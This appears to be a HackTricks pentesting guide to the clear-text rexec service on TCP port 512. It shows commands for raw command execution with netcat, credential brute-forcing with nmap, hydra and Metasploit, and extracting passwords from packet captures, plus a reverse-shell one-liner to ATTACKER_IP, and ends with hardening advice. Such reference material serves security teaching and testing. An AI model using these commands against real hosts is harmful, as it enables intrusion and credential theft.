HackTricks512 - Pentesting Rexec
Reading time: 5 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the π¬ Discord group or the telegram group or follow us on Twitter π¦ @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
Rexec (remote exec) is one of the original Berkeley r-services suite (together with rlogin, rsh, β¦). It provides a remote command-execution capability authenticated only with a clear-text username and password. The protocol was defined in the early 1980βs (see RFC 1060) and is nowadays considered insecure by design. Nevertheless it is still enabled by default in some legacy UNIX / network-attached equipment and occasionally shows up during internal pentests.
Default Port: TCP 512 (exec)
PORT STATE SERVICE
512/tcp open exec
π₯ All traffic β including credentials β is transmitted unencrypted. Anyone with the ability to sniff the network can recover the username, password and command.
Protocol quick-look
- Client connects to TCP 512.
- Client sends three NUL-terminated strings:
- the port number (as ASCII) where it wishes to receive stdout/stderr (often
0), - the username,
- the password.
- the port number (as ASCII) where it wishes to receive stdout/stderr (often
- A final NUL-terminated string with the command to execute is sent.
- The server replies with a single 8-bit status byte (0 = success,
1= failure) followed by the command output.
That means you can reproduce the exchange with nothing more than echo -e and nc:
(echo -ne "0\0user\0password\0id\0"; cat) | nc <target> 512
If the credentials are valid you will receive the output of id straight back on the same connection.
Manual usage with the client
Many Linux distributions still ship the legacy client inside the inetutils-rexec / rsh-client package:
rexec -l user -p password <target> "uname -a"
If -p is omitted the client will prompt interactively for the password (visible on the wire in clear-text!).
Enumeration & Brute-forcing
Brute-force
Nmap
nmap -p 512 --script rexec-info <target>
# Discover service banner and test for stdout port mis-configuration
nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target>
The rexec-brute NSE uses the protocol described above to try credentials very quickly .
Hydra / Medusa / Ncrack
hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8
hydra has a dedicated rexec module and remains the fastest offline bruteforcer . medusa (-M REXEC) and ncrack (rexec module) can be used in the same way.
Metasploit
use auxiliary/scanner/rservices/rexec_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
The module will spawn a shell on success and store the credentials in the database .
Sniffing credentials
Because everything is clear-text, network captures are priceless. With a copy of the traffic you can extract creds without touching the target:
tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
awk -F"\\0" '{print $2":"$3" -> "$4}' # username:password -> command
(In Wireshark enable Decode As β¦β TCP 512 β REXEC to view nicely-parsed fields.)
Post-Exploitation tips
- Commands run with the privileges of the supplied user. If
/etc/pam.d/rexecis mis-configured (e.g.pam_rootok), root shells are sometimes possible. - Rexec ignores the userβs shell and executes the command via
/bin/sh -c <cmd>. You can therefore use typical shell-escape tricks (;,$( ), backticks) to chain multiple commands or spawn reverse shells:rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"' - Passwords are often stored in ~/.netrc on other systems; if you compromise one host you may reuse them for lateral movement.
Hardening / Detection
- Do not expose rexec; replace it with SSH. Virtually all modern inetd superservers comment the service out by default.
- If you must keep it, restrict access with TCP wrappers (
/etc/hosts.allow) or firewall rules and enforce strong per-account passwords. - Monitor for traffic to :512 and for
rexecdprocess launches. A single packet capture is enough to detect a compromise. - Disable
rexec,rlogin,rshtogether β they share most of the same codebase and weaknesses.
References
- Nmap NSE
rexec-brutedocumentation β https://nmap.org/nsedoc/scripts/rexec-brute.html - Rapid7 Metasploit module
auxiliary/scanner/rservices/rexec_loginβ https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the π¬ Discord group or the telegram group or follow us on Twitter π¦ @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.